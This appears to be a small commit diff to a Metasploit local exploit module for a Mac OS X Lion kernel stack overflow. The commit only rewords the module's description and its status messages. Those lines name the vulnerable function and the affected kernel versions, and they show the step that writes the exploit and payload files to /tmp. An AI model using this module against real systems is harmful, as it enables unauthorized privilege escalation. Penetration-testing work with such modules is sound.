Touch up print_ statements
parent
a6edd94c7f
commit
a5baea1a8e
|
@ -19,8 +19,8 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
'Description' => %q{
|
||||
This exploit leverage a stack overflow vulnerability to escalate privileges.
|
||||
The vulnerable function nfs_convert_old_nfs_args does not verify the size
|
||||
of a user-provided argument before copying it to the stack. As a result by
|
||||
passing a large size, a local user can overwrite the stack with arbitrary
|
||||
of a user-provided argument before copying it to the stack. As a result, by
|
||||
passing a large size as an argument, a local user can overwrite the stack with arbitrary
|
||||
content.
|
||||
|
||||
Mac OS X Lion Kernel <= xnu-1699.32.7 except xnu-1699.24.8 are affected.
|
||||
|
@ -67,11 +67,11 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
tmpfile = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
|
||||
payloadfile = "/tmp/#{Rex::Text::rand_text_alpha_lower(12)}"
|
||||
|
||||
print_status "Writing temp file... #{tmpfile}"
|
||||
print_status "Writing temp file as '#{tmpfile}'"
|
||||
write_file(tmpfile, exploit)
|
||||
register_file_for_cleanup(tmpfile)
|
||||
|
||||
print_status "Writing payload file... #{payloadfile}"
|
||||
print_status "Writing payload file as '#{payloadfile}'"
|
||||
write_file(payloadfile, pload)
|
||||
register_file_for_cleanup(payloadfile)
|
||||
|
||||
|
|
Loading…
Reference in New Issue